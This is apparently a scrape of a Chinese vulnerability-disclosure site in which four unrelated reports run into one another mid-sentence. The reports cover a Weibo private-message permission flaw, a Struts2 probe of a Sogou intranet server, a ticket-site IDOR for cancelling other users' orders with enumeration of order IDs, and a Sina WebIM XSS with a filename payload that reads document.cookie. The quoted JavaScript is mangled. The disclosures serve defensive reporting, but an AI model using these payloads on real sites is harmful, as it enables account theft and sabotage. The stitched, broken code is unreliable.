分享漏洞：
披露状态：
： 细节已通知厂商并且等待厂商处理中
： 厂商已经主动忽略漏洞，细节向公众公开
简要描述：
手机登录微博可以给不是你的听众发私信，听众可以发私信给被自己收听的人。不知道这个算不算一个小小的漏洞。请各位大牛和厂商不要笑话我这个技术比较烂又热衷于关注网络安全的菜鸟。
详细说明：
手机登录微博可以给不是你的听众发私信，听众可以发私信给被自己收听的人。不知道这个算不算一个小小的漏洞。请各位大牛和厂商不要笑话我这个技术比较烂又热衷于关注网络安全的菜鸟。
漏洞证明：
自己测试成功过N次，也请别人测试成功过N次。
修复方案：
我不懂，你懂的。
版权声明：转载请注明来源 @
厂商回应：
危害等级：无影响厂商忽略
忽略时间： 00:28
厂商回复：
最新状态：
漏洞评价：
对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
权限绕过...? 坐等官方解释
蚊虫大牛，你也来了。个人觉得这是个不是漏洞的漏洞，越权而已。
手机接口和原有接口逻辑不一致是可能导致问题
如果证实了，那确实算是BUG，又得有程序猿挨骂了
利用方面,没有限制的话可以搞搞群发广告之类 大概就这样...
xsser，您不是管理员吗？ 怎么提交的漏洞还在审核呢？
厂商太牛x了，直接忽略，非要让人利用后搞的微博大乱才重视是吧？我并不是要你给多少rank。
忽略后偷偷修复。
登录后才能发表评论，请先分享漏洞：
披露状态：
： 细节已通知厂商并且等待厂商处理中
： 厂商已经确认，细节仅向厂商公开
： 细节向核心白帽子及相关领域专家公开
： 细节向普通白帽子公开
： 细节向实习白帽子公开
： 细节向公众公开
简要描述：
详细说明：
标题有点炫
的确是内网
我发现一个地址：http://waibao./import.jsp
有个下载模板
神马玩意？ 点一下看看
对下的什么玩意没有兴趣
因为我发现了现在地址：
http://waibao./DownloadAction
前面探路发现是Resin做服务
ok 立马操起 ST2 测试：
然后就没有然后了。。。
还真是内网。。
ok 权限很大。
内网渗透什么的算了
就到这里吧。
漏洞证明：
修复方案：
求公仔。。。
版权声明：转载请注明来源 @
厂商回应：
危害等级：中
漏洞Rank：10
确认时间： 17:57
厂商回复：
最新状态：
漏洞评价：
对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
这标题，味五、八七。
楼主你要完蛋
楼主失踪前私信我漏洞信息。。
洞主是去搜狗应聘杀进去的么...
@niliu 便衣……你懂的
楼主。有您的快递
又见连载的节奏
@safe121 哈。。。。。
@雷锋 谢谢
没。。。。。。
洞主爆破一号队就位，随时可以爆破搜狗总部。
@寂寞的瘦子
河南老乡 一路走好！
呵。。。。。。。
留下漏洞信息 走好 大牛
@爱上平顶山 大牛 你的顺丰快递到了 请开门拿一下
哈。。。。
咚咚咚...顺风快递.
登录后才能发表评论，请先分享漏洞：
披露状态：
： 细节已通知厂商并且等待厂商处理中
： 厂商已经确认，细节仅向厂商公开
： 细节向核心白帽子及相关领域专家公开
： 细节向普通白帽子公开
： 细节向实习白帽子公开
： 细节向公众公开
简要描述：
由于没有对用户的权限进行判断，导致任意用户都可以删除其他人的订单。
详细说明：
首先用139的用户进行登陆，然后订票，订两张吧：
然后生成订单如下：
然后，我们可以通过右键，查看源文件来查看我们的订单号：
我们用另外一个号登陆，接下来我们证明，可以取消任意用户订单：
现在我们的权限是159手机号码的权限，构造链接如下，然后访问之：
/user/order_mgr.do?m=orderCancel&orderId=&timestamp=Tue%20Nov%%%20GMT+0800&_=7
这里的订单号orderId= 为139用户的订单号。
可以看到服务器返回true
我们再访问一次：
/user/order_mgr.do?m=orderCancel&orderId=&timestamp=Tue%20Nov%%%20GMT+0800&_=7
因为刚才的订单已经删除，所以订单不存在，所以返回false,证明订单已经成功删除。。
然后我们登陆139手机的用户，看看订单是否被删除。可以看到，订单已经被删除了。
订单号码格式：
日16点41分 然后不断历遍后面的：
就可以使得网站在每时每刻都在删除订单。一个客户一经下单，立马就被删除了，被恶意竞争对手利用的话，危害巨大。。
漏洞证明：
修复方案：
设置好权限。
版权声明：转载请注明来源 @
厂商回应：
危害等级：高
漏洞Rank：15
确认时间： 17:29
厂商回复：
感谢风之传说同学的关注与贡献！此漏洞目测存在，马上联系业务部门整改。请私信留Q联系礼物事宜。谢谢！
最新状态：
漏洞评价：
对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
谢谢管理帮我弄好了排版。。刚才网络不行。。排版都是乱的。
@风之传说 你怎么知道应该怎么构造连接的？
@黑吃黑 抓包。
登录后才能发表评论，请先分享漏洞：
披露状态：
： 细节已通知厂商并且等待厂商处理中
： 厂商已经确认，细节仅向厂商公开
： 细节向核心白帽子及相关领域专家公开
： 细节向普通白帽子公开
： 细节向实习白帽子公开
： 细节向公众公开
简要描述：
因为“提交”，所以提交。
详细说明：
缺陷文件：http://js./t4/webim/js/webim.js?v=683ba479e29b6483
缺陷代码：
1. 微博私信中，点击图片，查看大图时，触发以下事件。
code 区域bindDomEvent: function() {
f.core.evt.delegatedEvent(this._root).add(&wbim_img_preview&, &click&,
function(r) {
var q = r.el,
s = q.getAttribute(&fid&),
t = q.getAttribute(&preview&),
p = q.getAttribute(&name&);
n = new f.wbim.ui.PreviewBox();
n.render(f.E(&wbim_box&))
t && g.fire(&previewBox.changeUrl&, {
f.core.evt.stopEvent()
2. 可以看到， p = q.getAttribute(&name&);
取出了图片元素的name属性。然后作为参数传递给了previewBox.changeUrl事件。
3. 再看事件被fire时的行为。
code 区域bindDataEvents: function() {
f.add(&previewBox.changeUrl&,
function(k, l) {
var m = l.
if (j._lastImgUrl && j._lastImgUrl == m) {
j.rotation(0)
if (j.img) {
j.boxNode.removeChild(j.img);
j.img = null
j.img = document.createElement(&img&);
j.boxNode.appendChild(j.img);
j.initArea = {
w: j.img.offsetWidth,
h: j.img.offsetHeight
j.resetStyle();
j.img.src = j._lastImgUrl =
j.downBT.href =
j.checkImgSize();
j.pictureName.innerHTML = l.name
其中 function(k,l){ } 为事件回调函数， l 为 步骤1中的
code 区域{
&-- q.getAttribute(&name&)
4. j.pictureName.innerHTML = l.name 这句实际的运行链条是：
j.pictureName.innerHTML = l.name = p = q.getAttribute(&name&)
----------------------------------------
由于获取图片的name属性后，没有做二次过滤，就直接输出到了innerHTML，从而导致XSS。
将一个图片的文件名修改为：baidu_sylogo1.gif#&&img src=1 onerror=alert(document.cookie)&.gif
在WEBIM处的聊天窗口里，上传这个图片并发送。
对方点击图片后，即可触发XSS。
----------------------------------------
代入到上面的缺陷过程走一遍。
code 区域&img title=&图片& alt=&baidu_sylogo1.gif#&&img src=1 onerror=alert(document.cookie)&.gif& src=&http://vdisk-thumb-/maxsize.191/data.vdisk.me/7c6794eecaca3f31c125f7b16b1cad56af0ea?ip=,172.16.105.125&ssig=reE%2BtbnAoV&Expires=&KID=sae,l30zoo1wmz&source=& onerror=&this.src='http://img./t4/appstyle/webim/images/file.gif';& action-type=&wbim_img_preview& fid=&& preview=&http://upload./2/mss/msget?source=&fid=& name=&baidu_sylogo1.gif#&&img src=1 onerror=alert(document.cookie)&.gif&&
p=q.getAttribute(&name&)= 自动转义(&baidu_sylogo1.gif#&&img src=1 onerror=alert(document.cookie)&.gif&) = baidu_sylogo1.gif#&&img src=1 onerror=alert(document.cookie)&;.gif
然后.innerHTML=p
就会运行alert(document.cookie)
------------------------------------------
运行效果如下：
漏洞证明：
修复方案：
1. 在取出q.getAttribute(&name&)后，进行二次过滤，再输出到innerHTML
2. 当然也可以和你们现在这样，把&改为x
版权声明：转载请注明来源 @
厂商回应：
危害等级：低
漏洞Rank：1
确认时间： 23:44
厂商回复：
感谢对新浪安全的关注，漏洞已过时。
最新状态：
漏洞评价：
对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
登录后才能发表评论，请先}